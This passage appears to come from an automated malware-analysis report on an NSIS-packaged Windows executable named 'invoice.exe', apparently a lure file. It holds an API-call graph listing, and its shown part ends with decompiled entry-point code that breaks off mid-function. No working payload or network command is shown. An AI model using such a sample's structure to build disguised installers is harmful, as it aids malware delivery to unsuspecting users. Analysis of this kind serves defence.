405f87 17 API calls 4297->4298 4298->4297 4299->4166 4300->4172 4301->4294 4303 405f87 17 API calls 4302->4303 4304 403b41 SetWindowTextA 4303->4304 4304->4297 4305->4216 4307 4059b1 4306->4307 4309 4059c1 4306->4309 4307->4309 4310 4059bc CharNextA 4307->4310 4308 4059e1 4308->4219 4308->4220 4309->4308 4311 405928 CharNextA 4309->4311 4310->4308 4311->4309 4313 406289 4312->4313 4314 40627e FindClose 4312->4314 4313->4226 4314->4313 4316 40372e 4315->4316 4317 4036f8 4316->4317 4318 403733 FreeLibrary GlobalFree 4316->4318 4319 40572d 4317->4319 4318->4317 4318->4318 4320 4059eb 18 API calls 4319->4320 4321 
40574d 4320->4321 4322 405755 DeleteFileA 4321->4322 4323 40576c 4321->4323 4324 403512 OleUninitialize 4322->4324 4325 4058a4 4323->4325 4359 405f65 lstrcpynA 4323->4359 4324->4059 4324->4060 4325->4324 4330 406268 2 API calls 4325->4330 4327 405792 4328 4057a5 4327->4328 4329 405798 lstrcatA 4327->4329 4331 405944 2 API calls 4328->4331 4333 4057ab 4329->4333 4332 4058be 4330->4332 4331->4333 4332->4324 4335 4058c2 4332->4335 4334 4057b9 lstrcatA 4333->4334 4336 4057c4 lstrlenA FindFirstFileA 4333->4336 4334->4336 4337 4058fd 3 API calls 4335->4337 4338 40589a 4336->4338 4357 4057e8 4336->4357 4339 4058c8 4337->4339 4338->4325 4341 4056e5 5 API calls 4339->4341 4340 405928 CharNextA 4340->4357 4342 4058d4 4341->4342 4343 4058d8 4342->4343 4344 4058ee 4342->4344 4343->4324 4349 40508c 24 API calls 4343->4349 4347 40508c 24 API calls 4344->4347 4345 405879 FindNextFileA 4348 405891 FindClose 4345->4348 4345->4357 4347->4324 4348->4338 4350 4058e5 4349->4350 4351 405d44 36 API calls 4350->4351 4354 4058ec 4351->4354 4353 40572d 60 API calls 4353->4357 4354->4324 4355 40508c 24 API calls 4355->4345 4356 40508c 24 API calls 4356->4357 4357->4340 4357->4345 4357->4353 4357->4355 4357->4356 4358 405d44 36 API calls 4357->4358 4360 405f65 lstrcpynA 4357->4360 4361 4056e5 4357->4361 4358->4357 4359->4327 4360->4357 4369 405ad9 GetFileAttributesA 4361->4369 4364 405700 RemoveDirectoryA 4367 40570e 4364->4367 4365 405708 DeleteFileA 4365->4367 4366 405712 4366->4357 4367->4366 4368 40571e SetFileAttributesA 4367->4368 4368->4366 4370 4056f1 4369->4370 4371 405aeb SetFileAttributesA 4369->4371 4370->4364 4370->4365 4370->4366 4371->4370 4373 405c20 GetShortPathNameA 4372->4373 4374 405bfa 4372->4374 4375 405c35 4373->4375 4376 405d3f 4373->4376 4399 405afe GetFileAttributesA CreateFileA 4374->4399 4375->4376 4379 405c3d wsprintfA 4375->4379 4376->4255 4378 405c04 CloseHandle GetShortPathNameA 4378->4376 4380 405c18 4378->4380 4381 405f87 17 API calls 4379->4381 4380->4373 
4380->4376 4382 405c65 4381->4382 4400 405afe GetFileAttributesA CreateFileA 4382->4400 4384 405c72 4384->4376 4385 405c81 GetFileSize GlobalAlloc 4384->4385 4386 405ca3 4385->4386 4387 405d38 CloseHandle 4385->4387 4388 405b76 ReadFile 4386->4388 4387->4376 4389 405cab 4388->4389 4389->4387 4401 405a63 lstrlenA 4389->4401 4392 405cc2 lstrcpyA 4395 405ce4 4392->4395 4393 405cd6 4394 405a63 4 API calls 4393->4394 4394->4395 4396 405d1b SetFilePointer 4395->4396 4397 405ba5 WriteFile 4396->4397 4398 405d31 GlobalFree 4397->4398 4398->4387 4399->4378 4400->4384 4402 405aa4 lstrlenA 4401->4402 4403 405aac 4402->4403 4404 405a7d lstrcmpiA 4402->4404 4403->4392 4403->4393 4404->4403 4405 405a9b CharNextA 4404->4405 4405->4402 4937 406372 WaitForSingleObject 4938 40638c 4937->4938 4939 40639e GetExitCodeProcess 4938->4939 4940 406339 2 API calls 4938->4940 4941 406393 WaitForSingleObject 4940->4941 4941->4938 4942 403773 4943 40377e 4942->4943 4944 403782 4943->4944 4945 403785 GlobalAlloc 4943->4945 4945->4944 4946 100015b3 4947 100014bb GlobalFree 4946->4947 4949 100015cb 4947->4949 4948 10001611 GlobalFree 4949->4948 4950 100015e6 4949->4950 4951 100015fd VirtualFree 4949->4951 4950->4948 4951->4948 4952 4014f4 SetForegroundWindow 4953 402951 4952->4953 4954 401cf5 4955 402a9f 17 API calls 4954->4955 4956 401cfc 4955->4956 4957 402a9f 17 API calls 4956->4957 4958 401d08 GetDlgItem 4957->4958 4959 402577 4958->4959 4960 4022f6 4961 402304 4960->4961 4962 4022fe 4960->4962 4964 402314 4961->4964 4965 402ac1 17 API calls 4961->4965 4963 402ac1 17 API calls 4962->4963 4963->4961 4967 402ac1 17 API calls 4964->4967 4969 402322 4964->4969 4965->4964 4966 402ac1 17 API calls 4968 40232b WritePrivateProfileStringA 4966->4968 4967->4969 4969->4966 4970 4026f8 4971 402ac1 17 API calls 4970->4971 4972 4026ff FindFirstFileA 4971->4972 4973 402722 4972->4973 4977 402712 4972->4977 4974 402729 4973->4974 4978 405ec3 wsprintfA 4973->4978 4979 405f65 lstrcpynA 4974->4979 4978->4974 
4979->4977 4980 40237b 4981 402382 4980->4981 4982 4023ad 4980->4982 4983 402b01 17 API calls 4981->4983 4984 402ac1 17 API calls 4982->4984 4985 402389 4983->4985 4986 4023b4 4984->4986 4988 402ac1 17 API calls 4985->4988 4990 4023c1 4985->4990 4991 402b7f 4986->4991 4989 40239a RegDeleteValueA RegCloseKey 4988->4989 4989->4990 4992 402b95 4991->4992 4993 402bab 4992->4993 4995 402bb4 4992->4995 4993->4990 4996 405deb RegOpenKeyExA 4995->4996 4997 402be2 4996->4997 4998 402c08 RegEnumKeyA 4997->4998 4999 402c1f RegCloseKey 4997->4999 5000 402c40 RegCloseKey 4997->5000 5002 402bb4 6 API calls 4997->5002 5004 402c33 4997->5004 4998->4997 4998->4999 5001 4062fd 5 API calls 4999->5001 5000->5004 5003 402c2f 5001->5003 5002->4997 5003->5004 5005 402c4e RegDeleteKeyA 5003->5005 5004->4993 5005->5004 4547 401ffd 4548 40200f 4547->4548 4550 4020bd 4547->4550 4549 402ac1 17 API calls 4548->4549 4552 402016 4549->4552 4551 401423 24 API calls 4550->4551 4557 40223c 4551->4557 4553 402ac1 17 API calls 4552->4553 4554 40201f 4553->4554 4555 402034 LoadLibraryExA 4554->4555 4556 402027 GetModuleHandleA 4554->4556 4555->4550 4558 402044 GetProcAddress 4555->4558 4556->4555 4556->4558 4559 402090 4558->4559 4560 402053 4558->4560 4561 40508c 24 API calls 4559->4561 4562 402072 4560->4562 4563 40205b 4560->4563 4564 402063 4561->4564 4568 100016bd 4562->4568 4565 401423 24 API calls 4563->4565 4564->4557 4566 4020b1 FreeLibrary 4564->4566 4565->4564 4566->4557 4569 100016ed 4568->4569 4610 10001a5d 4569->4610 4571 100016f4 4572 1000180a 4571->4572 4573 10001705 4571->4573 4574 1000170c 4571->4574 4572->4564 4658 100021b0 4573->4658 4642 100021fa 4574->4642 4579 10001770 4584 100017b2 4579->4584 4585 10001776 4579->4585 4580 10001752 4671 100023d8 4580->4671 4581 10001722 4583 10001728 4581->4583 4588 10001733 4581->4588 4582 1000173b 4599 10001731 4582->4599 4668 10002a9f 4582->4668 4583->4599 4652 100027e4 4583->4652 4592 100023d8 11 API calls 4584->4592 4590 10001559 3 API 
calls 4585->4590 4587 10001758 4682 10001559 4587->4682 4662 10002587 4588->4662 4595 1000178c 4590->4595 4600 100017a4 4592->4600 4598 100023d8 11 API calls 4595->4598 4597 10001739 4597->4599 4598->4600 4599->4579 4599->4580 4602 100017f9 4600->4602 4693 1000239e 4600->4693 4602->4572 4605 10001803 GlobalFree 4602->4605 4605->4572 4607 100017e5 4607->4602 4697 100014e2 wsprintfA 4607->4697 4608 100017de FreeLibrary 4608->4607 4700 10001215 GlobalAlloc 4610->4700 4612 10001a81 4701 10001215 GlobalAlloc 4612->4701 4614 10001cbb GlobalFree GlobalFree GlobalFree 4615 10001cd8 4614->4615 4624 10001d22 4614->4624 4616 1000201a 4615->4616 4615->4624 4625 10001ced 4615->4625 4619 1000203c GetModuleHandleA 4616->4619 4616->4624 4617 10001b60 GlobalAlloc 4618 10001a8c 4617->4618 4618->4614 4618->4617 4620 10001bab lstrcpyA 4618->4620 4621 10001bc9 GlobalFree 4618->4621 4618->4624 4626 10001bb5 lstrcpyA 4618->4626 4629 10001f7a 4618->4629 4635 10001c07 4618->4635 4636 10001e75 GlobalFree 4618->4636 4640 10001224 2 API calls 4618->4640 4707 10001215 GlobalAlloc 4618->4707 4622 10002062 4619->4622 4623 1000204d LoadLibraryA 4619->4623 4620->4626 4621->4618 4708 100015a4 GetProcAddress 4622->4708 4623->4622 4623->4624 4624->4571 4625->4624 4704 10001224 4625->4704 4626->4618 4628 100020b3 4628->4624 4630 100020c0 lstrlenA 4628->4630 4629->4624 4634 10001fbe lstrcpyA 4629->4634 4709 100015a4 GetProcAddress 4630->4709 4634->4624 4635->4618 4702 10001534 GlobalSize GlobalAlloc 4635->4702 4636->4618 4637 10002074 4637->4628 4641 1000209d GetProcAddress 4637->4641 4638 100020d9 4638->4624 4640->4618 4641->4628 4650 10002212 4642->4650 4644 10002347 GlobalFree 4645 10001712 4644->4645 4644->4650 4645->4581 4645->4582 4645->4599 4646 100022bb GlobalAlloc MultiByteToWideChar 4648 100022e5 GlobalAlloc CLSIDFromString GlobalFree 4646->4648 4649 10002306 4646->4649 4647 10001224 GlobalAlloc lstrcpynA 4647->4650 4648->4644 4649->4644 4715 1000251b 4649->4715 4650->4644 4650->4646 
4650->4647 4650->4649 4711 100012ad 4650->4711 4655 100027f6 4652->4655 4653 1000289b EnumResourceTypesA 4654 100028b9 4653->4654 4656 100029b5 4654->4656 4657 100029aa GetLastError 4654->4657 4655->4653 4656->4599 4657->4656 4659 100021c0 4658->4659 4660 1000170b 4658->4660 4659->4660 4661 100021d2 GlobalAlloc 4659->4661 4660->4574 4661->4659 4666 100025a3 4662->4666 4663 100025f4 GlobalAlloc 4667 10002616 4663->4667 4664 10002607 4665 1000260c GlobalSize 4664->4665 4664->4667 4665->4667 4666->4663 4666->4664 4667->4597 4669 10002aaa 4668->4669 4670 10002aea GlobalFree 4669->4670 4718 10001215 GlobalAlloc 4671->4718 4673 10002438 lstrcpynA 4680 100023e4 4673->4680 4674 10002449 StringFromGUID2 WideCharToMultiByte 4674->4680 4675 1000246d WideCharToMultiByte 4675->4680 4676 100024b2 GlobalFree 4676->4680 4677 1000248e wsprintfA 4677->4680 4678 100024ec GlobalFree 4678->4587 4679 10001266 2 API calls 4679->4680 4680->4673 4680->4674 4680->4675 4680->4676 4680->4677 4680->4678 4680->4679 4719 100012d1 4680->4719 4723 10001215 GlobalAlloc 4682->4723 4684 1000155f 4685 1000156c lstrcpyA 4684->4685 4687 10001586 4684->4687 4688 100015a0 4685->4688 4687->4688 4689 1000158b wsprintfA 4687->4689 4690 10001266 4688->4690 4689->4688 4691 100012a8 GlobalFree 4690->4691 4692 1000126f GlobalAlloc lstrcpynA 4690->4692 4691->4600 4692->4691 4694 100023ac 4693->4694 4696 100017c5 4693->4696 4695 100023c5 GlobalFree 4694->4695 4694->4696 4695->4694 4696->4607 4696->4608 4698 10001266 2 API calls 4697->4698 4699 10001503 4698->4699 4699->4602 4700->4612 4701->4618 4703 10001552 4702->4703 4703->4635 4710 10001215 GlobalAlloc 4704->4710 4706 10001233 lstrcpynA 4706->4624 4707->4618 4708->4637 4709->4638 4710->4706 4712 100012b4 4711->4712 4713 10001224 2 API calls 4712->4713 4714 100012cf 4713->4714 4714->4650 4716 10002529 VirtualAlloc 4715->4716 4717 1000257f 4715->4717 4716->4717 4717->4649 4718->4680 4720 100012f9 4719->4720 4721 100012da 4719->4721 4720->4680 4721->4720 4722 
100012e0 lstrcpyA 4721->4722 4722->4720 4723->4684 5006 1000103d 5007 1000101b 5 API calls 5006->5007 5008 10001056 5007->5008 5009 4018fd 5010 401934 5009->5010 5011 402ac1 17 API calls 5010->5011 5012 401939 5011->5012 5013 40572d 67 API calls 5012->5013 5014 401942 5013->5014 5015 40257d 5016 402582 5015->5016 5017 402596 5015->5017 5018 402a9f 17 API calls 5016->5018 5019 402ac1 17 API calls 5017->5019 5021 40258b 5018->5021 5020 40259d lstrlenA 5019->5020 5020->5021 5022 4025bf 5021->5022 5023 405ba5 WriteFile 5021->5023 5023->5022 5024 100029bf 5025 100029d7 5024->5025 5026 10001534 2 API calls 5025->5026 5027 100029f2 5026->5027 5028 401000 5029 401037 BeginPaint GetClientRect 5028->5029 5030 40100c DefWindowProcA 5028->5030 5032 4010f3 5029->5032 5033 401179 5030->5033 5034 401073 CreateBrushIndirect FillRect DeleteObject 5032->5034 5035 4010fc 5032->5035 5034->5032 5036 401102 CreateFontIndirectA 5035->5036 5037 401167 EndPaint 5035->5037 5036->5037 5038 401112 6 API calls 5036->5038 5037->5033 5038->5037 5039 405000 5040 405010 5039->5040 5041 405024 5039->5041 5042 405016 5040->5042 5051 40506d 5040->5051 5043 40502c IsWindowVisible 5041->5043 5047 405043 5041->5047 5045 404072 SendMessageA 5042->5045 5046 405039 5043->5046 5043->5051 5044 405072 CallWindowProcA 5048 405020 5044->5048 5045->5048 5052 404957 SendMessageA 5046->5052 5047->5044 5057 4049d7 5047->5057 5051->5044 5053 4049b6 SendMessageA 5052->5053 5054 40497a GetMessagePos ScreenToClient SendMessageA 5052->5054 5056 4049ae 5053->5056 5055 4049b3 5054->5055 5054->5056 5055->5053 5056->5047 5066 405f65 lstrcpynA 5057->5066 5059 4049ea 5067 405ec3 wsprintfA 5059->5067 5061 4049f4 5062 40140b 2 API calls 5061->5062 5063 4049fd 5062->5063 5068 405f65 lstrcpynA 5063->5068 5065 404a04 5065->5051 5066->5059 5067->5061 5068->5065 5069 401900 5070 402ac1 17 API calls 5069->5070 5071 401907 5070->5071 5072 405681 MessageBoxIndirectA 5071->5072 5073 401910 5072->5073 3699 402682 3700 402689 3699->3700 
3706 4028fe 3699->3706 3707 402a9f 3700->3707 3702 402690 3703 40269f SetFilePointer 3702->3703 3704 4026af 3703->3704 3703->3706 3710 405ec3 wsprintfA 3704->3710 3711 405f87 3707->3711 3709 402ab4 3709->3702 3710->3706 3725 405f94 3711->3725 3712 4061b6 3713 4061cb 3712->3713 3744 405f65 lstrcpynA 3712->3744 3713->3709 3715 406190 lstrlenA 3715->3725 3717 405f87 10 API calls 3717->3715 3720 4060ac GetSystemDirectoryA 3720->3725 3721 4060bf GetWindowsDirectoryA 3721->3725 3723 405f87 10 API calls 3723->3725 3724 406139 lstrcatA 3724->3725 3725->3712 3725->3715 3725->3717 3725->3720 3725->3721 3725->3723 3725->3724 3726 4060f3 SHGetSpecialFolderLocation 3725->3726 3728 405e4c 3725->3728 3733 4061cf 3725->3733 3742 405ec3 wsprintfA 3725->3742 3743 405f65 lstrcpynA 3725->3743 3726->3725 3727 40610b SHGetPathFromIDListA CoTaskMemFree 3726->3727 3727->3725 3745 405deb 3728->3745 3731 405e80 RegQueryValueExA RegCloseKey 3732 405eaf 3731->3732 3732->3725 3736 4061db 3733->3736 3734 406243 3735 406247 CharPrevA 3734->3735 3738 406262 3734->3738 3735->3734 3736->3734 3737 406238 CharNextA 3736->3737 3740 406226 CharNextA 3736->3740 3741 406233 CharNextA 3736->3741 3749 405928 3736->3749 3737->3734 3737->3736 3738->3725 3740->3736 3741->3737 3742->3725 3743->3725 3744->3713 3746 405dfa 3745->3746 3747 405e03 RegOpenKeyExA 3746->3747 3748 405dfe 3746->3748 3747->3748 3748->3731 3748->3732 3750 40592e 3749->3750 3751 405941 3750->3751 3752 405934 CharNextA 3750->3752 3751->3736 3752->3750 5074 401502 5075 40150a 5074->5075 5077 40151d 5074->5077 5076 402a9f 17 API calls 5075->5076 5076->5077 5078 401c04 5079 402a9f 17 API calls 5078->5079 5080 401c0b 5079->5080 5081 402a9f 17 API calls 5080->5081 5082 401c18 5081->5082 5083 401c2d 5082->5083 5084 402ac1 17 API calls 5082->5084 5085 401c3d 5083->5085 5086 402ac1 17 API calls 5083->5086 5084->5083 5087 401c94 5085->5087 5088 401c48 5085->5088 5086->5085 5090 402ac1 17 API calls 5087->5090 5089 402a9f 17 API calls 5088->5089 5091 
401c4d 5089->5091 5092 401c99 5090->5092 5093 402a9f 17 API calls 5091->5093 5094 402ac1 17 API calls 5092->5094 5095 401c59 5093->5095 5096 401ca2 FindWindowExA 5094->5096 5097 401c84 SendMessageA 5095->5097 5098 401c66 SendMessageTimeoutA 5095->5098 5099 401cc0 5096->5099 5097->5099 5098->5099 5100 404a09 GetDlgItem GetDlgItem 5101 404a5b 7 API calls 5100->5101 5108 404c73 5100->5108 5102 404af1 SendMessageA 5101->5102 5103 404afe DeleteObject 5101->5103 5102->5103 5104 404b07 5103->5104 5105 404b3e 5104->5105 5107 405f87 17 API calls 5104->5107 5109 404026 18 API calls 5105->5109 5106 404e03 5112 404e15 5106->5112 5113 404e0d SendMessageA 5106->5113 5114 404b20 SendMessageA SendMessageA 5107->5114 5111 404d57 5108->5111 5119 404957 5 API calls 5108->5119 5133 404ce4 5108->5133 5110 404b52 5109->5110 5115 404026 18 API calls 5110->5115 5111->5106 5116 404db0 SendMessageA 5111->5116 5140 404c66 5111->5140 5122 404e27 ImageList_Destroy 5112->5122 5123 404e2e 5112->5123 5136 404e3e 5112->5136 5113->5112 5114->5104 5134 404b60 5115->5134 5120 404dc5 SendMessageA 5116->5120 5116->5140 5117 40408d 8 API calls 5121 404ff9 5117->5121 5118 404d49 SendMessageA 5118->5111 5119->5133 5126 404dd8 5120->5126 5122->5123 5124 404e37 GlobalFree 5123->5124 5123->5136 5124->5136 5125 404c34 GetWindowLongA SetWindowLongA 5129 404c4d 5125->5129 5137 404de9 SendMessageA 5126->5137 5127 404fad 5128 404fbf ShowWindow GetDlgItem ShowWindow 5127->5128 5127->5140 5128->5140 5130 404c53 ShowWindow 5129->5130 5131 404c6b 5129->5131 5151 40405b SendMessageA 5130->5151 5152 40405b SendMessageA 5131->5152 5133->5111 5133->5118 5134->5125 5135 404baf SendMessageA 5134->5135 5138 404c2e 5134->5138 5141 404beb SendMessageA 5134->5141 5142 404bfc SendMessageA 5134->5142 5135->5134 5136->5127 5143 4049d7 4 API calls 5136->5143 5147 404e79 5136->5147 5137->5106 5138->5125 5138->5129 5140->5117 5141->5134 5142->5134 5143->5147 5144 404f83 InvalidateRect 5144->5127 5145 404f99 5144->5145 5153 404912 
5145->5153 5146 404ea7 SendMessageA 5150 404ebd 5146->5150 5147->5146 5147->5150 5149 404f31 SendMessageA SendMessageA 5149->5150 5150->5144 5150->5149 5151->5140 5152->5108 5156 40484d 5153->5156 5155 404927 5155->5127 5157 404863 5156->5157 5158 405f87 17 API calls 5157->5158 5159 4048c7 5158->5159 5160 405f87 17 API calls 5159->5160 5161 4048d2 5160->5161 5162 405f87 17 API calls 5161->5162 5163 4048e8 lstrlenA wsprintfA SetDlgItemTextA 5162->5163 5163->5155 5164 401490 5165 40508c 24 API calls 5164->5165 5166 401497 5165->5166 5167 401d95 GetDC 5168 402a9f 17 API calls 5167->5168 5169 401da7 GetDeviceCaps MulDiv ReleaseDC 5168->5169 5170 402a9f 17 API calls 5169->5170 5171 401dd8 5170->5171 5172 405f87 17 API calls 5171->5172 5173 401e15 CreateFontIndirectA 5172->5173 5174 402577 5173->5174 5175 404496 5176 4044c2 5175->5176 5177 4044d3 5175->5177 5236 405665 GetDlgItemTextA 5176->5236 5178 4044df GetDlgItem 5177->5178 5185 40453e 5177->5185 5181 4044f3 5178->5181 5180 4044cd 5183 4061cf 5 API calls 5180->5183 5184 404507 SetWindowTextA 5181->5184 5188 405996 4 API calls 5181->5188 5182 404622 5233 4047cc 5182->5233 5238 405665 GetDlgItemTextA 5182->5238 5183->5177 5189 404026 18 API calls 5184->5189 5185->5182 5190 405f87 17 API calls 5185->5190 5185->5233 5187 40408d 8 API calls 5192 4047e0 5187->5192 5193 4044fd 5188->5193 5194 404523 5189->5194 5195 4045b2 SHBrowseForFolderA 5190->5195 5191 404652 5196 4059eb 18 API calls 5191->5196 5193->5184 5200 4058fd 3 API calls 5193->5200 5197 404026 18 API calls 5194->5197 5195->5182 5198 4045ca CoTaskMemFree 5195->5198 5199 404658 5196->5199 5201 404531 5197->5201 5202 4058fd 3 API calls 5198->5202 5239 405f65 lstrcpynA 5199->5239 5200->5184 5237 40405b SendMessageA 5201->5237 5204 4045d7 5202->5204 5207 40460e SetDlgItemTextA 5204->5207 5211 405f87 17 API calls 5204->5211 5206 404537 5209 4062fd 5 API calls 5206->5209 5207->5182 5208 40466f 5210 4062fd 5 API calls 5208->5210 5209->5185 5218 404676 5210->5218 5212 
4045f6 lstrcmpiA 5211->5212 5212->5207 5214 404607 lstrcatA 5212->5214 5213 4046b2 5240 405f65 lstrcpynA 5213->5240 5214->5207 5216 4046b9 5217 405996 4 API calls 5216->5217 5219 4046bf GetDiskFreeSpaceA 5217->5219 5218->5213 5222 405944 2 API calls 5218->5222 5223 40470a 5218->5223 5221 4046e3 MulDiv 5219->5221 5219->5223 5221->5223 5222->5218 5224 404912 20 API calls 5223->5224 5234 40477b 5223->5234 5226 404768 5224->5226 5225 40479e 5241 404048 KiUserCallbackDispatcher 5225->5241 5228 40477d SetDlgItemTextA 5226->5228 5229 40476d 5226->5229 5227 40140b 2 API calls 5227->5225 5228->5234 5231 40484d 20 API calls 5229->5231 5231->5234 5232 4047ba 5232->5233 5235 4043ef SendMessageA 5232->5235 5233->5187 5234->5225 5234->5227 5235->5233 5236->5180 5237->5206 5238->5191 5239->5208 5240->5216 5241->5232 5242 10001058 5244 10001074 5242->5244 5243 100010dc 5244->5243 5245 100014bb GlobalFree 5244->5245 5246 10001091 5244->5246 5245->5246 5247 100014bb GlobalFree 5246->5247 5248 100010a1 5247->5248 5249 100010b1 5248->5249 5250 100010a8 GlobalSize 5248->5250 5251 100010b5 GlobalAlloc 5249->5251 5252 100010c6 5249->5252 5250->5249 5253 100014e2 3 API calls 5251->5253 5254 100010d1 GlobalFree 5252->5254 5253->5252 5254->5243 5255 401d1a 5256 402a9f 17 API calls 5255->5256 5257 401d28 SetWindowLongA 5256->5257 5258 402951 5257->5258 4724 40159d 4725 402ac1 17 API calls 4724->4725 4726 4015a4 SetFileAttributesA 4725->4726 4727 4015b6 4726->4727 5264 40149d 5265 4014ab PostQuitMessage 5264->5265 5266 4022e1 5264->5266 5265->5266 5267 401a1e 5268 402ac1 17 API calls 5267->5268 5269 401a27 ExpandEnvironmentStringsA 5268->5269 5270 401a3b 5269->5270 5272 401a4e 5269->5272 5271 401a40 lstrcmpA 5270->5271 5270->5272 5271->5272 5273 40171f 5274 402ac1 17 API calls 5273->5274 5275 401726 SearchPathA 5274->5275 5276 401741 5275->5276 5277 100010e0 5278 1000110e 5277->5278 5279 100011c4 GlobalFree 5278->5279 5280 100012ad 2 API calls 5278->5280 5281 100011c3 5278->5281 5282 10001266 
2 API calls 5278->5282 5283 10001155 GlobalAlloc 5278->5283 5284 100011ea GlobalFree 5278->5284 5285 100011b1 GlobalFree 5278->5285 5286 100012d1 lstrcpyA 5278->5286 5280->5278 5281->5279 5282->5285 5283->5278 5284->5278 5285->5278 5286->5278 5287 10002162 5288 100021c0 5287->5288 5289 100021f6 5287->5289 5288->5289 5290 100021d2 GlobalAlloc 5288->5290 5290->5288 3765 401e25 3766 402a9f 17 API calls 3765->3766 3767 401e2b 3766->3767 3768 402a9f 17 API calls 3767->3768 3769 401e37 3768->3769 3770 401e43 ShowWindow 3769->3770 3771 401e4e EnableWindow 3769->3771 3772 402951 3770->3772 3771->3772 5291 401f2b 5292 402ac1 17 API calls 5291->5292 5293 401f32 5292->5293 5294 406268 2 API calls 5293->5294 5295 401f38 5294->5295 5297 401f4a 5295->5297 5298 405ec3 wsprintfA 5295->5298 5298->5297 5299 40292c SendMessageA 5300 402951 5299->5300 5301 402946 InvalidateRect 5299->5301 5301->5300 5302 4026b4 5303 4026ba 5302->5303 5304 402951 5303->5304 5305 4026c2 FindClose 5303->5305 5305->5304 5306 402736 5307 402ac1 17 API calls 5306->5307 5308 402744 5307->5308 5309 40275a 5308->5309 5310 402ac1 17 API calls 5308->5310 5311 405ad9 2 API calls 5309->5311 5310->5309 5312 402760 5311->5312 5334 405afe GetFileAttributesA CreateFileA 5312->5334 5314 40276d 5315 402816 5314->5315 5316 402779 GlobalAlloc 5314->5316 5319 402831 5315->5319 5320 40281e DeleteFileA 5315->5320 5317 402792 5316->5317 5318 40280d CloseHandle 5316->5318 5335 4031a9 SetFilePointer 5317->5335 5318->5315 5320->5319 5322 402798 5323 403193 ReadFile 5322->5323 5324 4027a1 GlobalAlloc 5323->5324 5325 4027b1 5324->5325 5326 4027eb 5324->5326 5327 402f81 31 API calls 5325->5327 5328 405ba5 WriteFile 5326->5328 5333 4027be 5327->5333 5329 4027f7 GlobalFree 5328->5329 5330 402f81 31 API calls 5329->5330 5331 40280a 5330->5331 5331->5318 5332 4027e2 GlobalFree 5332->5326 5333->5332 5334->5314 5335->5322 5336 402837 5337 402a9f 17 API calls 5336->5337 5338 40283d 5337->5338 5339 402865 5338->5339 5340 40287c 5338->5340 
5345 402716 5338->5345 5341 402879 5339->5341 5342 40286a 5339->5342 5343 402896 5340->5343 5344 402886 5340->5344 5351 405ec3 wsprintfA 5341->5351 5350 405f65 lstrcpynA 5342->5350 5347 405f87 17 API calls 5343->5347 5346 402a9f 17 API calls 5344->5346 5346->5345 5347->5345 5350->5345 5351->5345 5352 4014b7 5353 4014bd 5352->5353 5354 401389 2 API calls 5353->5354 5355 4014c5 5354->5355 5356 401b39 5357 402ac1 17 API calls 5356->5357 5358 401b40 5357->5358 5359 402a9f 17 API calls 5358->5359 5360 401b49 wsprintfA 5359->5360 5361 402951 5360->5361 5362 40413a lstrcpynA lstrlenA 5363 40233a 5364 402ac1 17 API calls 5363->5364 5365 40234b 5364->5365 5366 402ac1 17 API calls 5365->5366 5367 402354 5366->5367 5368 402ac1 17 API calls 5367->5368 5369 40235e GetPrivateProfileStringA 5368->5369 4527 4015bb 4528 402ac1 17 API calls 4527->4528 4529 4015c2 4528->4529 4530 405996 4 API calls 4529->4530 4542 4015ca 4530->4542 4531 401624 4533 401652 4531->4533 4534 401629 4531->4534 4532 405928 CharNextA 4532->4542 4536 401423 24 API calls 4533->4536 4535 401423 24 API calls 4534->4535 4537 401630 4535->4537 4543 40164a 4536->4543 4546 405f65 lstrcpynA 4537->4546 4539 4055cf 2 API calls 4539->4542 4540 4055ec 5 API calls 4540->4542 4541 40163b SetCurrentDirectoryA 4541->4543 4542->4531 4542->4532 4542->4539 4542->4540 4544 40160c GetFileAttributesA 4542->4544 4545 405552 4 API calls 4542->4545 4544->4542 4545->4542 4546->4541 5370 4016bb 5371 402ac1 17 API calls 5370->5371 5372 4016c1 GetFullPathNameA 5371->5372 5373 4016d8 5372->5373 5374 4016f9 5372->5374 5373->5374 5377 406268 2 API calls 5373->5377 5375 402951 5374->5375 5376 40170d GetShortPathNameA 5374->5376 5376->5375 5378 4016e9 5377->5378 5378->5374 5380 405f65 lstrcpynA 5378->5380 5380->5374 5381 401d3b GetDlgItem GetClientRect 5382 402ac1 17 API calls 5381->5382 5383 401d6b LoadImageA SendMessageA 5382->5383 5384 402951 5383->5384 5385 401d89 DeleteObject 5383->5385 5385->5384

                                            Control-flow Graph

                                            [Figure: control_flow_graph 0, entry block 4031f1-403230 (SetErrorMode, GetVersion). Legend: Executed / Not Executed.]
                                            C-Code - Quality: 86%
                                            			_entry_() {
                                            				signed int _t42;
                                            				intOrPtr* _t47;
                                            				CHAR* _t51;
                                            				char* _t54;
                                            				CHAR* _t56;
                                            				void* _t60;
                                            				intOrPtr _t62;
                                            				int _t64;
                                            				int _t67;
                                            				signed int _t68;
                                            				int _t69;
                                            				signed int _t71;
                                            				void* _t95;
                                            				signed int _t111;
                                            				void* _t114;
                                            				void* _t119;
                                            				intOrPtr* _t120;
                                            				char _t123;
                                            				signed int _t142;
                                            				signed int _t143;
                                            				int _t151;
                                            				void* _t152;
                                            				intOrPtr* _t154;
                                            				CHAR* _t157;
                                            				CHAR* _t158;
                                            				void* _t160;
                                            				char* _t161;
                                            				void* _t164;
                                            				void* _t165;
                                            				char _t190;
                                            
                                            				 *(_t165 + 0x18) = 0;
                                            				 *((intOrPtr*)(_t165 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                            				 *(_t165 + 0x20) = 0;
                                            				 *(_t165 + 0x14) = 0x20;
                                            				SetErrorMode(0x8001); // executed
                                            				_t42 = GetVersion() & 0xbfffffff;
                                            				 *0x42f40c = _t42;
                                            				if(_t42 != 6) {
                                            					_t120 = E004062FD(0);
                                            					if(_t120 != 0) {
                                            						 *_t120(0xc00);
                                            					}
                                            				}
                                            				_t157 = "UXTHEME";
                                            				do {
                                            					E0040628F(_t157); // executed
                                            					_t157 =  &(_t157[lstrlenA(_t157) + 1]);
                                            				} while ( *_t157 != 0);
                                            				E004062FD(0xa);
                                            				 *0x42f404 = E004062FD(8);
                                            				_t47 = E004062FD(6);
                                            				if(_t47 != 0) {
                                            					_t47 =  *_t47(0x1e);
                                            					if(_t47 != 0) {
                                            						 *0x42f40f =  *0x42f40f | 0x00000040;
                                            					}
                                            				}
                                            				__imp__#17(_t160);
                                            				__imp__OleInitialize(0); // executed
                                            				 *0x42f4d8 = _t47;
                                            				SHGetFileInfoA(0x429830, 0, _t165 + 0x38, 0x160, 0); // executed
                                            				E00405F65("Yllerion Setup", "NSIS Error");
                                            				_t51 = GetCommandLineA();
                                            				_t161 = "\"C:\\Users\\Arthur\\Desktop\\invoice.exe\"";
